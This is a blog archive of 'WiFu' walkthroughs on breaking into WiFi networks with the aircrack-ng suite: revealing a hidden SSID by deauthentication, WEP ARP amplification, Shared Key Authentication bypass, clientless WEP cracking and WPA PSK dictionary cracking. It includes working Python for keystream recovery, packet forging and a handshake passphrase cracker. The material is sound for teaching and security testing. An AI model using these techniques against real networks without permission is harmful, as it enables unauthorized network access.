Category Archives: WiFu

WiFu – Breaking Hidden Networks

Filed under WiFu

In this demonstration I attempt to break into a hidden network. You cannot join a hidden network the way you join a normal one, because the access point leaves the SSID out of its beacons, so the network never shows up in an ordinary scan. The SSID is still sent in clear text in other management frames, such as a client's association request, and that is what this attack relies on.

First, after putting my Alfa AWUS036H adapter into monitor mode, I started airodump-ng on channel 6 and listened for networks. airodump-ng lists a hidden network with an empty ESSID column (shown as a length only), so the BSSID and channel are visible even though the name is not.

After noticing the hidden network, I stopped airodump-ng and started it again on channel 6, this time saving the captured data to a file called hidden (the -w option).

Noticing that there was an already authenticated client, I started aireplay-ng and de-authenticated the client (the -0 attack), forcing it to re-authenticate and re-associate. The association request it sends carries the SSID in clear text, which revealed that the hidden SSID was in fact Cisco.

With the SSID known, I fake-authenticated with the network Cisco using aireplay-ng, started the ARP request replay attack (-3) to increase the rate at which new IVs were generated, and cracked the WEP key with aircrack-ng.
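The point of the de-authentication above is that the SSID only disappears from beacons, not from the rest of the management traffic. The following is an added example, not code from the original post: it builds a few constructed 802.11 management frames (a beacon with an empty SSID element, the deauth, and the client's association request) and parses them the way airodump-ng would, picking the real SSID out of the association request. The MAC addresses and the frame contents are assumptions made up for the example.

```python
import struct

# 802.11 management subtypes (frame-control byte 0: subtype in the high nibble,
# type bits 00 = management). A hidden network's beacon carries an empty or
# NUL-filled SSID element; association requests and probe responses carry the real one.
ASSOC_REQ, REASSOC_REQ, PROBE_REQ, PROBE_RESP, BEACON = 0x0, 0x2, 0x4, 0x5, 0x8
# Size of the fixed fields between the 24-byte MAC header and the first information element
FIXED_LEN = {ASSOC_REQ: 4, REASSOC_REQ: 10, PROBE_REQ: 0, PROBE_RESP: 12, BEACON: 12}
BROADCAST = b"\xff" * 6


def ie(tag, value):
    """Encode one information element: element ID, length, value."""
    return bytes([tag, len(value)]) + value


def mgmt_frame(subtype, da, sa, bssid, fixed, ies):
    """Build a bare management frame (no FCS): frame control, duration, addr1-3, seq ctrl."""
    header = bytes([subtype << 4, 0x00]) + b"\x00\x00" + da + sa + bssid + b"\x00\x00"
    return header + fixed + ies


def parse_mgmt(frame):
    """Return (subtype, bssid, source, ssid, hidden) for a management frame, else None."""
    if frame[0] & 0x0C != 0x00:          # type bits set: not a management frame
        return None
    subtype = frame[0] >> 4
    if subtype not in FIXED_LEN:          # e.g. deauth (0xC): nothing to learn from it
        return None
    source, bssid = frame[10:16], frame[16:22]
    body = frame[24 + FIXED_LEN[subtype]:]
    ssid = None
    i = 0
    while i + 2 <= len(body):             # walk the tagged parameters
        tag, length = body[i], body[i + 1]
        if tag == 0:                      # element ID 0 = SSID
            ssid = body[i + 2:i + 2 + length]
            break
        i += 2 + length
    hidden = ssid is not None and ssid.strip(b"\x00") == b""
    return subtype, bssid, source, ssid, hidden


def reveal_hidden_ssids(frames):
    """Map BSSID -> SSID using only frames in which a hidden SSID must appear in clear text."""
    learned = {}
    for frame in frames:
        parsed = parse_mgmt(frame)
        if parsed is None:
            continue
        subtype, bssid, _source, ssid, hidden = parsed
        if ssid is None or hidden or bssid == BROADCAST:
            continue
        if subtype in (ASSOC_REQ, REASSOC_REQ, PROBE_RESP):
            learned[bssid] = ssid.decode("utf-8", errors="replace")
    return learned


def sample_capture():
    """Constructed frames standing in for the airodump-ng capture: a hidden beacon, the
    deauth we inject, then the client's association request after it was kicked off."""
    ap = bytes.fromhex("001122aabbcc")        # constructed AP / BSSID address
    client = bytes.fromhex("00aabb112233")    # constructed client address
    beacon_fixed = b"\x00" * 8 + struct.pack("<HH", 100, 0x0411)  # timestamp, interval, capabilities
    hidden_beacon = mgmt_frame(BEACON, BROADCAST, ap, ap, beacon_fixed,
                               ie(0, b"") + ie(1, b"\x82\x84\x8b\x96") + ie(3, b"\x06"))
    deauth = mgmt_frame(0xC, client, ap, ap, struct.pack("<H", 7), b"")  # reason 7
    assoc_req = mgmt_frame(ASSOC_REQ, ap, client, ap, struct.pack("<HH", 0x0411, 10),
                           ie(0, b"Cisco") + ie(1, b"\x82\x84\x8b\x96"))
    return [hidden_beacon, deauth, assoc_req]


if __name__ == "__main__":
    for frame in sample_capture():
        print(parse_mgmt(frame))
    print(reveal_hidden_ssids(sample_capture()))
```

Probe requests are deliberately left out of reveal_hidden_ssids: a client probing for "Cisco" only tells you what it is looking for, whereas an association request or a probe response ties the name to a BSSID that actually answered.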

WiFu – ARP Amplification

Filed under WiFu

Using ARP to our advantage can greatly increase our IV generation rate. ARP amplification is an advanced topic and is not one for newcomers.

In this demonstration I first performed a standard 1-to-1 attack (one new IV from the access point for each packet injected) by creating a generic broadcast ARP request; the injection rate was around 400 packets per second, which is considered pretty good.

While attacking a network it is possible to find out the IP address range in use, and even an associated client's IP address, by decrypting a captured packet with an attack such as the KoreK chopchop attack. With this information you can more than double your IV generation rate: an ARP request addressed to an existing wireless client's IP is relayed by the access point to that client, the client answers, and the access point relays the answer back, so each injected packet yields up to three new encrypted packets rather than one, a 1-to-3 rate.

WiFu – Bypassing Shared Key Authentication

Filed under WiFu

When attacking a WEP-encrypted WiFi network you can come across two different authentication methods, Open System and Shared Key. In the previous video we attacked an Open System WEP network, so this time we are going to attack a Shared Key Authentication (SKA) WEP network.

In this video I started aireplay-ng and tried to fake-authenticate, but quickly realised it was not an open network: the access point rejected the open authentication and aireplay-ng reported that it was switching to Shared Key authentication. A fake authentication cannot complete against SKA on its own, because the access point sends a challenge that must be returned WEP-encrypted.

Next I started airodump-ng on channel 6, saving the captured data to a file called 'linksys', and then de-authenticated an associated client so that it would have to complete a new shared key authentication, which airodump-ng would capture. The SKA exchange contains the clear-text challenge and the client's WEP-encrypted response, and XORing the two gives the RC4 keystream for that IV; airodump-ng writes it out as a sharedkey-*.xor file.

Once captured, we use that keystream file (the -y option of aireplay-ng) to answer the access point's challenge when we fake-authenticate ourselves. This works fine, and we successfully authenticated with the target network without knowing the WEP key.

As in the previous video, we then obtain a PRGA so that we can craft our own packets for the network, build a broadcast ARP request with packetforge-ng, and inject it in the hope that the access point will relay it with a new IV each time; finally we crack the WEP key for the network using aircrack-ng.

WiFu – Cracking Clientless WEP

Filed under WiFu

In this video I demonstrate how to authenticate with a clientless Open System WEP network and break the WEP key in a relatively short time using the aircrack-ng tools. Clientless means there is no associated station whose traffic we can replay, so we have to generate the encrypted traffic ourselves.

I was using Back|Track 4 R1 in this video, but the default driver does not work too well with my AWUS036H USB WiFi card, so I removed the new drivers and loaded the older Back|Track 3 drivers.

The next step was to enable monitor mode on my wireless card using airmon-ng and start airodump-ng on channel 6 to see what was about.

After I identified the target network, I started screen and ran airodump-ng again on channel 6, writing the captured data to a file called 'linksys'.

I then performed a fake authentication with the target network using aireplay-ng and started listening for a data packet from the clientless network (this can take up to five minutes, since an access point with no clients sends very little data) so that I could obtain a PRGA for the network. The PRGA is a stretch of RC4 keystream for one IV, and having it lets me encrypt my own packets for later injection without knowing the key.

Once obtained, I used packetforge-ng to create a generic ARP request packet encrypted with that PRGA, using 255.255.255.255 as both the source and destination IP, since most wireless access points will relay such a broadcast, and each relayed copy would carry a new IV for the target network.

I then used aireplay-ng again, this time in interactive replay mode (-2) with the newly crafted packet, to inject it repeatedly, which caused the access point to produce new IVs.

Once enough IVs were captured, I used aircrack-ng to recover the network's WEP key, which it prints in hex.
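The three WEP posts above (bypassing Shared Key Authentication, ARP amplification and the clientless attack) all rest on one fact: with a few hundred bytes of RC4 keystream for a single IV you can encrypt any frame you like for that IV, without ever learning the key. The following is an added example, not code from the original posts or from the aircrack-ng suite. It simulates the access point with plain RC4 and a constructed 40-bit key, sniffs one constructed SKA exchange, recovers the keystream by XOR (what ends up in sharedkey-*.xor), answers a fresh challenge with it (the aireplay-ng -y bypass), and then reuses the same keystream as a PRGA to forge a WEP-encrypted ARP request, either to the broadcast address as packetforge-ng does for the clientless attack or to a known client's IP for the amplification variant. The key, IV, challenge, MAC and IP addresses are all assumptions made up for the example.

```python
import struct
import zlib
from ipaddress import IPv4Address


def rc4(key, length):
    """Plain RC4 keystream. WEP seeds it with IV || key, so a reused IV reuses the keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def with_icv(plaintext):
    """WEP appends a CRC-32 integrity check value (ICV) before encrypting."""
    return plaintext + struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(key, iv, plaintext):
    """What the AP or a legitimate client does (needs the key): IV, key-id byte, RC4 stream."""
    body = with_icv(plaintext)
    return iv + b"\x00" + xor(body, rc4(iv + key, len(body)))


def wep_decrypt(key, frame_body):
    """AP-side check used here to confirm forged frames are accepted: (plaintext, icv_ok)."""
    iv, ct = frame_body[:3], frame_body[4:]
    body = xor(ct, rc4(iv + key, len(ct)))
    return body[:-4], with_icv(body[:-4]) == body


def encrypt_with_keystream(iv, keystream, plaintext):
    """What packetforge-ng and aireplay-ng -y do: no key, only keystream for this one IV."""
    body = with_icv(plaintext)
    if len(body) > len(keystream):
        raise ValueError("not enough keystream for this frame")
    return iv + b"\x00" + xor(body, keystream)


def ska_response_plaintext(challenge):
    """Auth frame 3 body: algorithm 1 (shared key), sequence 3, status 0, challenge element (ID 16)."""
    return struct.pack("<HHH", 1, 3, 0) + bytes([16, len(challenge)]) + challenge


def recover_keystream(challenge, encrypted_response):
    """The sharedkey-*.xor trick: known plaintext XOR sniffed ciphertext = keystream for that IV."""
    body = with_icv(ska_response_plaintext(challenge))
    return encrypted_response[:3], xor(body, encrypted_response[4:])


def arp_request(sender_mac, sender_ip, target_ip):
    """LLC/SNAP header + Ethernet/IPv4 ARP request, the payload packetforge-ng -0 builds."""
    llc_snap = b"\xaa\xaa\x03\x00\x00\x00\x08\x06"
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, 1) + sender_mac + IPv4Address(sender_ip).packed
           + b"\x00" * 6 + IPv4Address(target_ip).packed)
    return llc_snap + arp


def demo(target_ip="255.255.255.255"):
    """Sniff one SKA exchange, reuse its keystream to authenticate and to forge ARP requests."""
    key = bytes.fromhex("0a1b2c3d4e")       # constructed 40-bit WEP key; only the "AP" has it
    challenge = bytes(range(128))           # constructed 128-byte challenge text from the AP
    iv = b"\x11\x22\x33"                    # constructed IV chosen by the legitimate client
    # A legitimate client answers the challenge; we sniff both challenge and encrypted answer.
    sniffed = wep_encrypt(key, iv, ska_response_plaintext(challenge))
    iv, keystream = recover_keystream(challenge, sniffed)
    # Bypass: answer a fresh challenge with the same IV and the recovered keystream.
    fresh = bytes(reversed(range(128)))
    forged_auth = encrypt_with_keystream(iv, keystream, ska_response_plaintext(fresh))
    plain, ok = wep_decrypt(key, forged_auth)
    auth_accepted = ok and plain == ska_response_plaintext(fresh)
    # The same keystream is a PRGA: forge an ARP request (broadcast, or a known client's IP
    # for the 1-to-3 amplification) that the AP will accept and relay with fresh IVs.
    arp = arp_request(bytes.fromhex("00c0ca112233"), "192.168.1.123", target_ip)
    plain, ok = wep_decrypt(key, encrypt_with_keystream(iv, keystream, arp))
    return auth_accepted, ok and plain == arp, len(keystream)


if __name__ == "__main__":
    print(demo())                    # broadcast ARP, as in the clientless attack
    print(demo("192.168.1.50"))      # ARP to a known client, the amplification variant
```

The 140 bytes of keystream recovered from the SKA exchange are more than enough for a 40-byte ARP frame, which is why the shared key handshake doubles as the PRGA for packet forging; the forged frames are only valid for that one IV, but WEP never rejects a repeated IV, so that is not a limitation for the attacker.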

WiFu – Cracking WPA PSK

Filed under WiFu

In this video I demonstrate how simple it is to crack a WPA pre-shared key (PSK) with tools freely available in the aircrack-ng suite, provided the passphrase appears in the word list.

I first put my Alfa AWUS036H USB WiFi card into monitor mode, listened for WiFi traffic on channel 6, and noted down the target's BSSID and the MAC addresses of its associated clients.

I needed airodump-ng to keep running, and capturing to a file, during the next stages, so I started a screen session and ran airodump-ng again inside it.

Once I had found an associated client, I created another screen session and used aireplay-ng to send a de-authentication packet to that client, in the hope that it would reconnect and perform a fresh four-way handshake with the target network for airodump-ng to capture.

Once I had captured the four-way handshake, I stopped airodump-ng and cracked the PSK with aircrack-ng using the example dictionary that comes with the suite. This is a dictionary attack rather than true brute force: each candidate passphrase is run through PBKDF2 with the SSID as salt to get a PMK, the PTK is derived from it together with the two MAC addresses and two nonces in the handshake, and the resulting MIC is compared with the one in the captured EAPOL frame.
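The following is an added example, not code from the original post or from aircrack-ng, showing what that dictionary attack actually computes. It constructs a stand-in for the captured handshake (a hypothetical SSID, BSSID, client MAC, nonces and an EAPOL message 2 whose MIC was computed from a known passphrase, all assumptions for the example), then recovers the passphrase from a small word list by re-deriving the PMK and PTK per candidate and checking the MIC, exactly the check aircrack-ng performs on a real capture.

```python
import hashlib
import hmac
import struct


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key, label, data):
    """IEEE 802.11i PRF-512: concatenated HMAC-SHA1 blocks, truncated to 64 bytes."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK from the PMK, both MAC addresses and both nonces; the KCK is its first 16 bytes."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol, descriptor_version=2):
    """MIC over the EAPOL-Key frame with its MIC field (offset 81, 16 bytes) zeroed.
    Descriptor version 1 (WPA/TKIP) uses HMAC-MD5, version 2 (WPA2/CCMP) HMAC-SHA1."""
    zeroed = eapol[:81] + b"\x00" * 16 + eapol[97:]
    digest = hashlib.md5 if descriptor_version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, digest).digest()[:16]


def eapol_msg2(snonce, key_data, mic=b"\x00" * 16):
    """Handshake message 2 (station -> AP): EAPOL header + key descriptor with SNonce and MIC."""
    body = (b"\x02" + struct.pack(">HH", 0x010A, 16) + b"\x00" * 8 + snonce + b"\x00" * 16
            + b"\x00" * 8 + b"\x00" * 8 + mic + struct.pack(">H", len(key_data)) + key_data)
    return b"\x01\x03" + struct.pack(">H", len(body)) + body


def make_capture(passphrase):
    """Constructed stand-in for the airodump-ng capture: everything a real handshake leaks."""
    cap = {
        "ssid": "linksys",
        "ap_mac": bytes.fromhex("001122aabbcc"),      # constructed BSSID
        "sta_mac": bytes.fromhex("00aabb112233"),     # constructed client
        "anonce": bytes(range(32)),                   # constructed nonces
        "snonce": bytes(range(32, 64)),
    }
    ptk = derive_ptk(pmk_from_passphrase(passphrase, cap["ssid"]), cap["ap_mac"],
                     cap["sta_mac"], cap["anonce"], cap["snonce"])
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # WPA2-PSK, CCMP
    unsigned = eapol_msg2(cap["snonce"], rsn_ie)
    cap["eapol"] = eapol_msg2(cap["snonce"], rsn_ie, eapol_mic(ptk[:16], unsigned))
    return cap


def crack_psk(cap, wordlist):
    """The dictionary attack: derive PMK and PTK per candidate and compare the MIC."""
    target_mic = cap["eapol"][81:97]
    for candidate in wordlist:
        ptk = derive_ptk(pmk_from_passphrase(candidate, cap["ssid"]), cap["ap_mac"],
                         cap["sta_mac"], cap["anonce"], cap["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], cap["eapol"]), target_mic):
            return candidate
    return None


if __name__ == "__main__":
    capture = make_capture("dictionary")
    print(crack_psk(capture, ["password", "letmein", "dictionary", "qwerty"]))
```

The cost is entirely in pmk_from_passphrase: 4096 HMAC-SHA1 iterations per candidate, salted with the SSID, which is why the attack is only fast when the passphrase is in the word list and why precomputed tables only help for common SSIDs.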